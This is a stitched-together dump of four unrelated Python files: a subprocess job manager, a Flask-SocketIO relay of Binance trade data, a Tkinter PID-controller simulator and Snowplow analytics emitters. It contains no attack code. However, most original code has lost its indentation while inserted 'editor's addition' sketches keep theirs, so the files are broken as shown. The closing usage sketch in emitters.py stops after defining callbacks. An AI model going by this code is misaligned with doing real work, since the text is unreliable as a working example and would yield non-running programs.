job.py
|
# Copyright (c) 2020 by Terry Greeniaus.
import threading
import json
import uuid
import os
import reap
class Job:
STATUS_PENDING = 0
STATUS_RUNNING = 1
STATUS_COMPLETE = 2
def __init__(self, name, module=None, function=None, args=(), kwargs=None,
cmd=None, cwd=None, notify_meta=None, notify_complete=None,
manager_notify=None):
self.name = name
self.module = module
self.function = function
self.args = args
self.kwargs = kwargs or {}
self.cmd = cmd or ['/usr/bin/env', 'python3',
'-m', 'jman.mod_func_loader']
self.cwd = cwd
self.notify_meta = notify_meta
self.notify_complete = [x for x in (manager_notify, notify_complete)
if x is not None]
self.uuid = uuid.uuid1()
self.status = Job.STATUS_PENDING
self.wfd = None
self.wfd_lock = threading.Lock()
self.thread = None
self.proc = None
self.meta = None
self.istate = None
self.error_log = None
@staticmethod
def from_mod_func(module, function, name=None, **kwargs):
assert 'cmd' not in kwargs
return Job(name, module=module, function=function, **kwargs)
@staticmethod
def from_cmd(cmd, name=None, **kwargs):
assert 'module' not in kwargs
assert 'function' not in kwargs
return Job(name, cmd=cmd, **kwargs)
def spawn(self):
self.status = Job.STATUS_RUNNING
self.thread = threading.Thread(target=self._workloop, daemon=True)
self.thread.start()
def join(self, timeout=None):
self.thread.join(timeout)
def get_status_str(self):
if self.status == Job.STATUS_PENDING:
return 'PENDING'
if self.status == Job.STATUS_RUNNING:
return 'RUNNING'
if self.status == Job.STATUS_COMPLETE:
return 'COMPLETE'
return '???'
def _write_istate(self):
# Assumes wfd_lock is held.
if self.wfd is not None:
self.wfd.write('INPUT: %s\n' % json.dumps(self.istate))
self.wfd.flush()
def set_istate(self, istate):
with self.wfd_lock:
self.istate = istate
self._write_istate()
def _workloop(self):
rfd, child_wfd = os.pipe()
child_rfd, wfd = os.pipe()
rfd = os.fdopen(rfd, 'r')
wfd = os.fdopen(wfd, 'w')
env = os.environ.copy()
if self.module:
env['JMAN_MODULE'] = self.module
if self.function:
env['JMAN_FUNCTION'] = self.function
if self.cwd:
env['JMAN_CWD'] = self.cwd
env['JMAN_RFD'] = str(child_rfd)
env['JMAN_WFD'] = str(child_wfd)
with self.wfd_lock:
self.wfd = wfd
self.proc = reap.Popen(self.cmd, pass_fds=(child_rfd, child_wfd),
env=env, cwd=self.cwd)
os.close(child_rfd)
os.close(child_wfd)
j = json.dumps({'uuid' : str(self.uuid),
'args' : self.args,
'kwargs' : self.kwargs,
})
wfd.write(j + '\n')
wfd.flush()
if self.istate is not None:
self._write_istate()
while True:
l = rfd.readline()
if not l:
break
cmd, _, data = l.partition(':')
if cmd == 'META':
self.meta = json.loads(data)
if self.notify_meta:
self.notify_meta(self)
elif cmd == 'ERROR_LOG':
self.error_log = json.loads(data)
self.proc.communicate()
self.status = Job.STATUS_COMPLETE
for f in self.notify_complete:
f(self)
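# ---------------------------------------------------------------------------
# Illustrative usage sketch (editor's addition, not part of the original
# module). It assumes the jman package (which provides mod_func_loader) and
# the reap library are installed, and that a hypothetical worker module
# `my_tasks` exposes a `crunch()` function.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    def on_done(job):
        # Runs on the worker thread once the child process has exited.
        print('job %s (%s) finished: %s' % (job.name, job.uuid,
                                            job.get_status_str()))

    job = Job.from_mod_func('my_tasks', 'crunch', name='demo',
                            args=(1, 2), kwargs={'verbose': True},
                            notify_complete=on_done)
    job.spawn()                       # starts the worker thread and subprocess
    job.set_istate({'progress': 0})   # pushed to the child over its input pipe
    job.join()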
|
server.py
|
import asyncio
import json
import threading
import flask
import websockets
from flask_socketio import SocketIO, emit, send
from flask_cors import CORS, cross_origin
host = "127.0.0.1"
port = 4040
app = flask.Flask(__name__)
app.config["DEBUG"] = True
app.config['CORS_HEADERS'] = 'Content-Type'
cors = CORS(app)
socketio = SocketIO(app, cors_allowed_origins="*")
@socketio.on('message')
def handle_message(message):
print(f'received message: {message}')
async def consumer_handler(frames):
async for frame in frames:
trade = json.loads(frame)
mappedTrade = {"symbol": trade['s'], "price": float(trade['p']), "quantity": float(trade['q'])}
socketio.emit("trade", mappedTrade)
async def connect():
async with websockets.connect("wss://stream.binance.com:9443/ws/btcusdt@trade") as ws:
await consumer_handler(ws)
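# ---------------------------------------------------------------------------
# Illustrative consumer sketch (editor's addition, not part of the original
# script). It assumes the separate `python-socketio` client package; run it
# from another process to print the "trade" events emitted by this server.
# ---------------------------------------------------------------------------
def example_trade_consumer():
    import socketio as sio_client  # assumed extra dependency (python-socketio)
    client = sio_client.Client()

    @client.on("trade")
    def on_trade(data):
        print(f"{data['symbol']}: {data['quantity']} @ {data['price']}")

    client.connect(f"http://{host}:{port}")
    client.wait()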
def runSocketio():
    # Run the Binance websocket consumer in its own asyncio event loop.
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)
    loop.run_until_complete(connect())
if __name__ == "__main__":
    print("App is starting...")
    # Consume the Binance stream on a background thread and serve the
    # Socket.IO app on the main thread; the original ordering never reached
    # socketio.run(), so the Flask-SocketIO server was never started.
    t = threading.Thread(target=runSocketio, daemon=True)
    t.start()
    socketio.run(app, host=host, port=port)
|
PID.py
|
from tkinter import * # import the Tkinter module
import tkinter.colorchooser
import tkinter.messagebox as messagebox
import threading
import datetime
import time
import math
import random
import sys
sys.setrecursionlimit(100000) # raise the recursion limit (the timer loop is recursive)
root=Tk()
root.title("PID Simulator") # set the main window title
root.geometry("885x550")
root.resizable(0,0)
#root.iconbitmap(".\\tk.ico")
MaxOutPut=65 # maximum output value
Timer_Flag=False
Timer_Itv=1
Adjust_Flag=False
Err_Accumulation=0.0
N_Cycle = 500
N_Tolerance = 0.05
N_Optimize_Cycle = 100
Data=[]
Kp_Min=[]
Kp_Max=[]
KKp=0
KKi=0
def Data_Init(flag):
global Data
global Err_Accumulation
global Kp_Min
global Kp_Max
global KKp
global Optimize_Cycle
if flag==0:
Err_Accumulation=0.0
Data.clear()
Data=[[0] * 100, [ 0 ] * 100, [0] * 100, [0]*100, [0]*100, [0]*100, [0]*100]
elif flag == 1:
Kp_Min.clear()
Kp_Min = [0]*100
Kp_Max.clear()
Kp_Max = [0]*100
Kp_Max[-1] = 10
Kp_Min[-1] = 0
KKp = Kp_Max[-1]
Optimize_Cycle=0
# coordinate transforms (data -> canvas pixels)
X_C = lambda x: x * 5 + 50
Y_C = lambda y: (4000 - 25 * y) / 11
# input block
SetInput = [50, 0, 0, 0, 1] # stores setpoint, frequency, input type, current cycle, growth flag
frmInput = Frame(root) #bd=2, relief=RIDGE,bg='yellow')
frmInput.grid(row=0, column=0, rowspan=2, padx=5, pady=5)
def Mysel(): # the input-type radio buttons control the frequency slider
if SetInput[2] != Inputvar.get():
SetInput[2] = Inputvar.get()
Data_Init(0)
if Inputvar.get() == 0:
scaleSetF.set(0)
scaleSetF.config(state=DISABLED)
else:
scaleSetF.config(state=NORMAL)
dic = {0: 'Manual ', 1: 'Square ', 2: 'Triangle ', 3: 'Sine '}
Inputvar = IntVar()
Inputvar.set(0)
for i,j in dic.items():
RB=Radiobutton(frmInput,text=j,variable=Inputvar,value=i,command=Mysel)
RB.grid(row=i,column=0,padx=1,pady=1,sticky=W)
for i,j in {0:'S P :',1:'Period:'}.items():
Label(root,text=j).grid(row=i,column=1,padx=3,pady=3)
def SetP_Change(tt): # read the setpoint (amplitude)
SetInput[0]=int(tt)
def SetF_Change(tt): # read the frequency
SetInput[1]=int(tt)
SetP=IntVar() # setpoint / waveform amplitude
scaleSetP=Scale(root,orient=HORIZONTAL,variable=SetP,command=SetP_Change,
from_=0,to=100,resolution=5)
scaleSetP.set(SetInput[0])
scaleSetP.grid(row=0,column=2)
SetF=IntVar() # waveform frequency
scaleSetF=Scale(root,orient=HORIZONTAL,variable=SetF,command=SetF_Change,
from_=0,to=20.0,resolution=2,state=DISABLED)
scaleSetF.set(SetInput[1])
scaleSetF.grid(row=1,column=2)
#PID parameter block
SetPara=[0.6,0.3,0.1] # stores the Kp, Ki, Kd values
frmParameter=Frame()
frmParameter.grid(row=3,column=0,columnspan=3,padx=3,pady=1)
def Para_Set(tt,i): # read the Kp/Ki/Kd values
SetPara[i]=float(tt)
dic = {0:'Kp: ',1:'Ki: ',2:'Kd: '}
ScalePID=[]
for i,j in dic.items():
Label(frmParameter,text=j).grid(row=i,column=1,padx=8,pady=3)
Entry(frmParameter,width=12,textvariable=SetPara[i]
).grid(row=i,column=2,padx=10,pady=3)
SC=Scale(frmParameter,orient=HORIZONTAL,variable=SetPara[i],
command=lambda i=i,j=i:Para_Set(i,j),from_=0,to=10.0,resolution=0.05)
SC.set(SetPara[i])
ScalePID.append(SC)
SC.grid(row=i,column=3,padx=1,pady=1)
#run-time readouts and colour settings block
def Myclick(tt):
    TakeCol = tkinter.colorchooser.askcolor() # pick a colour
    #Buttons1[tt]['bg']=TakeCol[1] # give the button the new background colour
    Buttons1[tt].config(bg=TakeCol[1]) # give the button the new background colour
    CurveCol[tt]=TakeCol[1] # update the colour list
CurveName=['Up:','Ui:','Ud:','OP:','PV:','E :']
CurveVal=[StringVar(),StringVar(),StringVar(),StringVar(),StringVar(),StringVar()]
CurveCol=['#ffffff','#ffffff','#ffffff','#0000ff','#ff0000','#00ff00','#000000']
frmCurve=Frame()
frmCurve.grid(row=4,column=0,columnspan=3,padx=3,pady=3)
Buttons1=[]
for i in CurveName:
j=CurveName.index(i)
if j<3:
k=j
l=0
else:
k=j-3
l=3
Label(frmCurve,text=i).grid(row=k,column=l,padx=8,pady=3,sticky=W)
CurveVal[j].set('0.0000')
Label(frmCurve,width=10,textvariable=CurveVal[j],relief=SUNKEN
).grid(row=k,column=l+1,padx=3,pady=3)
BT=Button(frmCurve,width=3,command=lambda j=j:Myclick(j),bg=CurveCol[j])
BT.grid(row=k,column=l+2,padx=1,pady=1)
Buttons1.append(BT)
#plant (system) parameter block
SystemVar=['Speed:','Disturbance:','Inertia:','Lag:']
SystemVal=[11,0,6,6] # initial values
Down_Level=[1,0,1,1] # lower bounds
Up_Level=[20,10,10,10] # upper bounds
frmSystem=Frame()
frmSystem.grid(row=5,column=0,columnspan=3,padx=1,pady=1)
def Sys_Set(tt,i):
global SystemVal
global Timer_Itv
SystemVal[i]=int(tt)
if i==0:
Timer_Itv=2.1-SystemVal[0]/10
for i in SystemVar:
j=SystemVar.index(i)
Label(frmSystem,text=i).grid(row=j//2,column=j%2*2,padx=8,pady=3,sticky=W)
SC=Scale(frmSystem,orient=HORIZONTAL,variable=SystemVar[j],
command=lambda i=j,j=j:Sys_Set(i,j),from_=Down_Level[j],to=Up_Level[j])
SC.set(SystemVal[j])
SC.grid(row=j//2,column=j%2*2+1,padx=1,pady=1)
def Value_Test(content): # validate the maximum-output entry
global MaxOutPut
if content == "" :
return True
elif content.isdigit() :
if float(content)>0 and float(content)<=100:
MaxOutPut=float(content)
return True
else:
return False
else:
return False
Label(root,text='Max output:').grid(row=6,column=0,padx=8,pady=3,sticky=W)
Outputvar=StringVar()
Outputvar.set(str(MaxOutPut))
Value_Test_cmd=root.register(Value_Test) # the validator function has to be registered with Tk
ET=Entry(root,width=12,textvariable=Outputvar,validate='key',validatecommand=(Value_Test_cmd,'%P'))
# %P is the prospective content of the entry if the edit is allowed
ET.grid(row=6,column=1,padx=1,pady=1)
#plot canvas block
CV=Canvas(root,width=550,height=500,bg='white')
CV.grid(row=0,column=3,rowspan=6,columnspan=12,padx=3,pady=3,sticky=N)
def Draw_Canvas():
CV.delete(ALL)
CV.create_line(X_C(-5),Y_C(0),X_C(100),Y_C(0),fill='#888888',width=2)
CV.create_line(X_C(0),Y_C(150),X_C(0),Y_C(-50),fill='#888888',width=3)
CV.create_line(X_C(-1),Y_C(150),X_C(0),Y_C(150),fill='#888888',width=2)
CV.create_line(X_C(-1),Y_C(100),X_C(0),Y_C(100),fill='#888888',width=2)
CV.create_line(X_C(-1),Y_C(50),X_C(0),Y_C(50),fill='#888888',width=2)
CV.create_line(X_C(-1),Y_C(-50),X_C(0),Y_C(-50),fill='#888888',width=2)
CV.create_text(X_C(-4),Y_C(150),fill='#888888', text='150')
CV.create_text(X_C(-4),Y_C(100),fill='#888888', text='100')
CV.create_text(X_C(-3),Y_C(50),fill='#888888', text='50')
CV.create_text(X_C(-4),Y_C(-50),fill='#888888', text='-50')
def Time_Itv(): # timer loop: runs in a worker thread and re-invokes itself
    if Timer_Flag:
        #print("current time: %s" % time.ctime())
        Draw_Canvas() # redraw
        if Adjust_Flag:
            PID_Adjust()
        else:
            Do_Cal() # compute one simulation step
        time.sleep(Timer_Itv) # sleep for the timer interval
        Time_Itv() # call itself again to start the next timing cycle
#action buttons block
def ButtonClick(tt):
#global Timer_Itv
global Timer_Flag
global Adjust_Flag
    if tt==0: # Simulate
Adjust_Flag=False
if Timer_Flag:
Timer_Flag=False
            Buttons2[0].config(text='Simulate')
else:
Timer_Flag=True
            Buttons2[0].config(text='Pause')
Data_Init(0)
ta = threading.Thread(target=Time_Itv,args=())
            ta.start() # start the worker thread
    elif tt==1: # Reset
Data_Init(0)
Data_Init(1)
Draw_Canvas()
    elif tt==2: # Tune
Adjust_Flag=True
Timer_Flag=True
        Buttons2[0].config(text='Pause')
Data_Init(1)
ta = threading.Thread(target=Time_Itv,args=())
        ta.start() # start the worker thread
    elif tt==3: # About
        messagebox.showinfo("About", "PID Simulator V2.0\n\n"+
                            "A tool for learning about and simulating PID control\n\n"+
                            "Kp: increasing it speeds up the response and shrinks the steady-state error, but increases oscillation and reduces stability;\n"+
                            "Ki: increasing it removes the steady-state error faster, but increases overshoot and reduces stability;\n"+
                            "Kd: increasing it raises sensitivity and damps oscillation, but weakens disturbance rejection;\n\n"+
                            "More inertia raises Kp, Ki and Kd exponentially;\n"+"more lag leaves Kp unchanged, lowers Ki exponentially and raises Kd linearly;\n\n"+
                            "Incremental PID algorithm\nPlant model: inertia + lag\n\nAuto-tuning method: 4:1 decay ratio\n\n"+
                            "Author: gzhstar\n2021-5"
                            "")
    elif tt==4: # Exit
        My_End()
ButtonName=['Simulate','Reset','Tune','About','Exit']
Buttons2=[]
for i in ButtonName:
j=ButtonName.index(i)
BT=Button(root,text=i,command=lambda j=j:ButtonClick(j))
BT.grid(row=6,column=j+10,padx=1,pady=1)
Buttons2.append(BT)
Buttons2[1].config(state=DISABLED)
Data_Init(0)
Draw_Canvas()
def Do_Cal():
global Data
global SetInput
    t=0 # compute the setpoint value
    if SetInput[1]>0: # a waveform is selected
        if SetInput[4]==1: # rising phase
SetInput[3]+=1
if SetInput[3]-SetInput[1]>=0:
SetInput[3]=SetInput[1]
SetInput[4]=0
        else: # falling phase
SetInput[3]-=1
if SetInput[3]<=0:
SetInput[3]=0
SetInput[4]=1
        if SetInput[2]==1: # square wave
if SetInput[4]==1:
t=SetInput[0]
else:
t=0
        elif SetInput[2]==2: # triangle wave
t=SetInput[0]/SetInput[1]*SetInput[3]
        else: # sine wave
t=SetInput[0]*(math.sin((SetInput[1]/2-SetInput[3])/SetInput[1]*3.14)+1)/2
    else: # manual setpoint
t=SetInput[0]
    del Data[6][0] # drop the oldest sample
    Data[6].append(t) # append the newest sample
Do_PID(SetPara[0],SetPara[1],SetPara[2],1)
    for i in range(len(CurveVal)): # update the numeric readouts
CurveVal[i].set(str(Data[i][-1])[0:8])
    for j in range(len(Data)): # draw the curves
#t=Data[j][99]+random.randint(-5,5)
tmp=[]
for i in range(100):
tmp.append(X_C(i))
tmp.append(Y_C(Data[j][i]))
CV.create_line(tmp,fill=CurveCol[j])
def Do_PID(Kp,Ki,Kd,flag):
#['Up:','Ui:','Ud:','OP:','PV:','E :','SV']
global Data
global Err_Accumulation
    global SystemVal # [speed, disturbance, inertia, lag]
for i in range(len(Data)-1):
del Data[i][0]
Data[0].append(Kp*(Data[5][-1]-Data[5][-2])) #Up
Data[1].append(Ki*Data[5][-1]) #Ui
Data[2].append(Kd*(Data[5][-1]+Data[5][-3]-2*Data[5][-2])) #Ud
opv=Data[4][-1]+Data[0][-1]+Data[1][-1]+Data[2][-1]
if opv>MaxOutPut:
opv=MaxOutPut
if opv<-MaxOutPut:
opv=-MaxOutPut
Data[3].append(opv) #OP
    if flag!=0: # during tuning (flag==0) the random disturbance is skipped
        opv=opv+random.randint(-1,1)*SystemVal[1]/10 # disturbance
    opv=opv*(1-SystemVal[2]/11)+Data[4][-1]*SystemVal[2]/11 # inertia
    Data[4].append(opv) #PV
    Data[5].append(Data[6][-1]-Data[4][-SystemVal[3]]) # E (first-order lag)
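# ---------------------------------------------------------------------------
# Illustrative sketch (editor's addition, not part of the original program):
# the incremental PID step used by Do_PID above, written as a standalone
# function with hypothetical inputs.
# ---------------------------------------------------------------------------
def incremental_pid_step(kp, ki, kd, err, prev_out, max_out=MaxOutPut):
    """err holds the three most recent errors [e(k-2), e(k-1), e(k)]."""
    delta = (kp * (err[-1] - err[-2])                    # proportional part: change of the error
             + ki * err[-1]                              # integral part: current error
             + kd * (err[-1] + err[-3] - 2 * err[-2]))   # derivative part: second difference
    out = prev_out + delta                               # incremental form: add the delta to the previous output
    return max(-max_out, min(max_out, out))              # clamp to the output limit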
def PID_Adjust(): # PID auto-tuning
    global Timer_Flag
    global Adjust_Flag
global Kp_Min
global Kp_Max
global Optimize_Cycle
global KKp
global KKi
global ScalePID
global SetPara
KKi_Cycle=0
KKK=0
Inflexion1,Inflexion2,Inflexion3=0.0,0.0,0.0
Optimize_Cycle+=1
if Optimize_Cycle>N_Optimize_Cycle:
Adjust_Flag=False
Timer_Flag=False
        messagebox.showinfo("Info", "Tuning failed: no suitable parameters were found within the optimisation budget.")
    flag=0 # flag for the peak search (1 once the first peak is found)
j=0
    Data_Init(0) # reset the data
Data[6][-1]=50
while j<N_Cycle:
j+=1
        #del Data[6][0] # drop the oldest sample
        #Data[6].append(SetInput[0]) # append the newest sample
Do_PID(KKp,0,0,0)
if flag==1:
KKi_Cycle+=1
if Data[5][-2]-Data[5][-1]>=0 and Data[5][-2]>Data[5][-3]:
KKK=KKi_Cycle
Inflexion2=Data[5][-2]
        if Data[5][-1]-Data[5][-2]>=0 and Data[5][-3]-Data[5][-2]>0.0001 and j>SystemVal[3]: # a peak was found
            if flag==1: # second peak
                KKi=KKi_Cycle # number of cycles between the first and second peaks
                Inflexion3=Data[5][-2] # error at the second peak
break
            if flag==0: # first peak
flag=1
KKi_Cycle=0
Inflexion1=Data[5][-2]
if j>=N_Cycle:
Adjust_Flag=False
Timer_Flag=False
        messagebox.showinfo("Info", "Tuning failed: two matching peaks were not found.")
else:
        #narrow the search range
Tolerance=(Inflexion2-Inflexion1)-(Inflexion2-Inflexion3)*2
if abs(Tolerance)<=N_Tolerance or Kp_Max[-1]-Kp_Min[-1]<=N_Tolerance/100:
Adjust_Flag=False
Timer_Flag=False
SetPara[0]=0.6*KKp
SetPara[1]=SetPara[0]/(0.18*KKi)
SetPara[2]=SetPara[0]*(0.02*KKi)
for k in range(3):
ScalePID[k].set(SetPara[k])
            messagebox.showinfo("Info","Tuning succeeded."+"\n\n Kp: "+str(SetPara[0])[0:4]+
                                "\n Ki: "+str(SetPara[1])[0:4]+"\n Kd: "+str(SetPara[2])[0:4])
else:
if Tolerance > 0:
del Kp_Min[0]
del Kp_Max[0]
Kp_Min.append(KKp)
Kp_Max.append(Kp_Max[-1])
KKp +=(Kp_Max[-1] - Kp_Min[-1]) / 3
else:
del Kp_Min[0]
del Kp_Max[0]
Kp_Min.append(Kp_Min[-1])
Kp_Max.append(KKp)
KKp -= (Kp_Max[-1] - Kp_Min[-1]) / 3
for i in range(100):
if Kp_Min[i]+Kp_Max[i]>0:
CV.create_rectangle(X_C(i),Y_C(Kp_Min[i]*10),
X_C(i+1),Y_C(Kp_Max[i]*10),fill='#00ff00')
def My_End():
global Timer_Flag
Timer_Flag=False
time.sleep(2)
    #messagebox.showinfo("Exit","Exiting the program!")
root.quit()
#root.destroy()
root.protocol("WM_DELETE_WINDOW", My_End)
root.mainloop()
|
emitters.py
|
"""
emitters.py
Copyright (c) 2013-2014 Snowplow Analytics Ltd. All rights reserved.
This program is licensed to you under the Apache License Version 2.0,
and you may not use this file except in compliance with the Apache License
Version 2.0. You may obtain a copy of the Apache License Version 2.0 at
http://www.apache.org/licenses/LICENSE-2.0.
Unless required by applicable law or agreed to in writing,
software distributed under the Apache License Version 2.0 is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
express or implied. See the Apache License Version 2.0 for the specific
language governing permissions and limitations there under.
Authors: Anuj More, Alex Dean, Fred Blundun
Copyright: Copyright (c) 2013-2014 Snowplow Analytics Ltd
License: Apache License Version 2.0
"""
import json
import logging
import time
import threading
try:
# Python 2
from Queue import Queue
except ImportError:
# Python 3
from queue import Queue
import redis
import requests
from contracts import contract, new_contract
from snowplow_tracker.self_describing_json import SelfDescribingJson
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
DEFAULT_MAX_LENGTH = 10
PAYLOAD_DATA_SCHEMA = "iglu:com.snowplowanalytics.snowplow/payload_data/jsonschema/1-0-4"
new_contract("protocol", lambda x: x == "http" or x == "https")
new_contract("method", lambda x: x == "get" or x == "post")
new_contract("function", lambda x: hasattr(x, "__call__"))
new_contract("redis", lambda x: isinstance(x, (redis.Redis, redis.StrictRedis)))
class Emitter(object):
"""
Synchronously send Snowplow events to a Snowplow collector
Supports both GET and POST requests
"""
@contract
def __init__(self, endpoint, protocol="http", port=None, method="get", buffer_size=None, on_success=None, on_failure=None, byte_limit=None):
"""
:param endpoint: The collector URL. Don't include "http://" - this is done automatically.
:type endpoint: string
:param protocol: The protocol to use - http or https. Defaults to http.
:type protocol: protocol
:param port: The collector port to connect to
:type port: int | None
:param method: The HTTP request method
:type method: method
:param buffer_size: The maximum number of queued events before the buffer is flushed. Default is 10.
:type buffer_size: int | None
:param on_success: Callback executed after every HTTP request in a flush has status code 200
Gets passed the number of events flushed.
:type on_success: function | None
        :param on_failure: Callback executed if at least one HTTP request in a flush fails (does not get a successful status code)
Gets passed two arguments:
1) The number of events which were successfully sent
2) If method is "post": The unsent data in string form;
If method is "get": An array of dictionaries corresponding to the unsent events' payloads
:type on_failure: function | None
        :param byte_limit: The size in bytes of queued events at which the buffer will be flushed
:type byte_limit: int | None
"""
self.endpoint = Emitter.as_collector_uri(endpoint, protocol, port, method)
self.method = method
if buffer_size is None:
if method == "post":
buffer_size = DEFAULT_MAX_LENGTH
else:
buffer_size = 1
self.buffer_size = buffer_size
self.buffer = []
self.byte_limit = byte_limit
self.bytes_queued = None if byte_limit is None else 0
self.on_success = on_success
self.on_failure = on_failure
self.lock = threading.RLock()
self.timer = None
logger.info("Emitter initialized with endpoint " + self.endpoint)
@staticmethod
@contract
def as_collector_uri(endpoint, protocol="http", port=None, method="get"):
"""
:param endpoint: The raw endpoint provided by the user
:type endpoint: string
:param protocol: The protocol to use - http or https
:type protocol: protocol
:param port: The collector port to connect to
:type port: int | None
:param method: Either `get` or `post` HTTP method
:type method: method
:rtype: string
"""
if method == "get":
path = "/i"
else:
path = "/com.snowplowanalytics.snowplow/tp2"
if port is None:
return protocol + "://" + endpoint + path
else:
return protocol + "://" + endpoint + ":" + str(port) + path
@contract
def input(self, payload):
"""
Adds an event to the buffer.
If the maximum size has been reached, flushes the buffer.
:param payload: The name-value pairs for the event
:type payload: dict(string:*)
"""
with self.lock:
if self.bytes_queued is not None:
self.bytes_queued += len(str(payload))
if self.method == "post":
self.buffer.append({key: str(payload[key]) for key in payload})
else:
self.buffer.append(payload)
if self.reached_limit():
self.flush()
def reached_limit(self):
"""
Checks if event-size or bytes limit are reached
:rtype: bool
"""
if self.byte_limit is None:
return len(self.buffer) >= self.buffer_size
else:
return self.bytes_queued >= self.byte_limit or len(self.buffer) >= self.buffer_size
def flush(self):
"""
Sends all events in the buffer to the collector.
"""
with self.lock:
self.send_events(self.buffer)
self.buffer = []
if self.bytes_queued is not None:
self.bytes_queued = 0
@contract
def http_post(self, data):
"""
:param data: The array of JSONs to be sent
:type data: string
"""
logger.info("Sending POST request to %s..." % self.endpoint)
logger.debug("Payload: %s" % data)
r = requests.post(self.endpoint, data=data, headers={'content-type': 'application/json; charset=utf-8'})
getattr(logger, "info" if self.is_good_status_code(r.status_code) else "warn")("POST request finished with status code: " + str(r.status_code))
return r
@contract
def http_get(self, payload):
"""
:param payload: The event properties
:type payload: dict(string:*)
"""
logger.info("Sending GET request to %s..." % self.endpoint)
logger.debug("Payload: %s" % payload)
r = requests.get(self.endpoint, params=payload)
getattr(logger, "info" if self.is_good_status_code(r.status_code) else "warn")("GET request finished with status code: " + str(r.status_code))
return r
def sync_flush(self):
"""
Calls the flush method of the base Emitter class.
This is guaranteed to be blocking, not asynchronous.
"""
logger.debug("Starting synchronous flush...")
Emitter.flush(self)
logger.info("Finished synchrous flush")
@staticmethod
@contract
def is_good_status_code(status_code):
"""
:param status_code: HTTP status code
:type status_code: int
:rtype: bool
"""
return 200 <= status_code < 400
@contract
def send_events(self, evts):
"""
:param evts: Array of events to be sent
:type evts: list(dict(string:*))
"""
if len(evts) > 0:
logger.info("Attempting to send %s requests" % len(evts))
Emitter.attach_sent_timestamp(evts)
if self.method == 'post':
data = SelfDescribingJson(PAYLOAD_DATA_SCHEMA, evts).to_string()
post_succeeded = False
try:
status_code = self.http_post(data).status_code
post_succeeded = self.is_good_status_code(status_code)
except requests.RequestException as e:
logger.warn(e)
if post_succeeded:
if self.on_success is not None:
self.on_success(len(evts))
elif self.on_failure is not None:
self.on_failure(0, evts)
elif self.method == 'get':
success_count = 0
unsent_requests = []
for evt in evts:
get_succeeded = False
try:
status_code = self.http_get(evt).status_code
get_succeeded = self.is_good_status_code(status_code)
except requests.RequestException as e:
logger.warn(e)
if get_succeeded:
success_count += 1
else:
unsent_requests.append(evt)
if len(unsent_requests) == 0:
if self.on_success is not None:
self.on_success(success_count)
elif self.on_failure is not None:
self.on_failure(success_count, unsent_requests)
else:
logger.info("Skipping flush since buffer is empty")
@contract
def set_flush_timer(self, timeout, flush_now=False):
"""
Set an interval at which the buffer will be flushed
:param timeout: interval in seconds
:type timeout: int | float
:param flush_now: immediately flush buffer
:type flush_now: bool
"""
        # Repeatedly re-create the timer so the buffer keeps flushing
if flush_now:
self.flush()
self.timer = threading.Timer(timeout, self.set_flush_timer, [timeout, True])
self.timer.daemon = True
self.timer.start()
def cancel_flush_timer(self):
"""
Abort automatic async flushing
"""
if self.timer is not None:
self.timer.cancel()
@staticmethod
def attach_sent_timestamp(events):
"""
Attach (by mutating in-place) current timestamp in milliseconds
as `stm` param
:param events: Array of events to be sent
:type events: list(dict(string:*))
:rtype: None
"""
def update(e):
            e.update({'stm': str(int(time.time() * 1000))})
[update(event) for event in events]
class AsyncEmitter(Emitter):
"""
Uses threads to send HTTP requests asynchronously
"""
@contract
def __init__(
self,
endpoint,
protocol="http",
port=None,
method="get",
buffer_size=None,
on_success=None,
on_failure=None,
thread_count=1,
byte_limit=None):
"""
:param endpoint: The collector URL. Don't include "http://" - this is done automatically.
:type endpoint: string
:param protocol: The protocol to use - http or https. Defaults to http.
:type protocol: protocol
:param port: The collector port to connect to
:type port: int | None
:param method: The HTTP request method
:type method: method
:param buffer_size: The maximum number of queued events before the buffer is flushed. Default is 10.
:type buffer_size: int | None
:param on_success: Callback executed after every HTTP request in a flush has status code 200
Gets passed the number of events flushed.
:type on_success: function | None
        :param on_failure: Callback executed if at least one HTTP request in a flush fails (does not get a successful status code)
Gets passed two arguments:
1) The number of events which were successfully sent
2) If method is "post": The unsent data in string form;
If method is "get": An array of dictionaries corresponding to the unsent events' payloads
:type on_failure: function | None
:param thread_count: Number of worker threads to use for HTTP requests
:type thread_count: int
        :param byte_limit: The size in bytes of queued events at which the buffer will be flushed
:type byte_limit: int | None
"""
super(AsyncEmitter, self).__init__(endpoint, protocol, port, method, buffer_size, on_success, on_failure, byte_limit)
self.queue = Queue()
for i in range(thread_count):
t = threading.Thread(target=self.consume)
t.daemon = True
t.start()
def sync_flush(self):
while True:
self.flush()
self.queue.join()
if len(self.buffer) < 1:
break
def flush(self):
"""
        Hands the current buffer to the worker-thread queue
        (the worker threads execute the base Emitter send) and resets the buffer
"""
with self.lock:
self.queue.put(self.buffer)
self.buffer = []
if self.bytes_queued is not None:
self.bytes_queued = 0
def consume(self):
while True:
evts = self.queue.get()
self.send_events(evts)
self.queue.task_done()
class CeleryEmitter(Emitter):
"""
Uses a Celery worker to send HTTP requests asynchronously.
Works like the base Emitter class,
but on_success and on_failure callbacks cannot be set.
"""
def __init__(self, endpoint, protocol="http", port=None, method="get", buffer_size=None, byte_limit=None):
super(CeleryEmitter, self).__init__(endpoint, protocol, port, method, buffer_size, None, None, byte_limit)
def flush(self):
"""
Schedules a flush task
"""
super(CeleryEmitter, self).flush.delay()
logger.info("Scheduled a Celery task to flush the event queue")
class RedisEmitter(object):
"""
Sends Snowplow events to a Redis database
"""
@contract
def __init__(self, rdb=None, key="snowplow"):
"""
:param rdb: Optional custom Redis database
:type rdb: redis | None
:param key: The Redis key for the list of events
:type key: string
"""
if rdb is None:
rdb = redis.StrictRedis()
self.rdb = rdb
self.key = key
@contract
def input(self, payload):
"""
:param payload: The event properties
:type payload: dict(string:*)
"""
logger.debug("Pushing event to Redis queue...")
self.rdb.rpush(self.key, json.dumps(payload))
logger.info("Finished sending event to Redis.")
def flush(self):
logger.warn("The RedisEmitter class does not need to be flushed")
def sync_flush(self):
self.flush()
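# ---------------------------------------------------------------------------
# Illustrative usage sketch (editor's addition, not part of the original
# module). The collector hostname is hypothetical; with buffer_size=2 the
# second input() triggers a flush.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    def ok(count):
        logger.info("sent %d events" % count)

    def failed(sent_count, unsent):
        logger.warning("only %d events sent, %d unsent" % (sent_count, len(unsent)))

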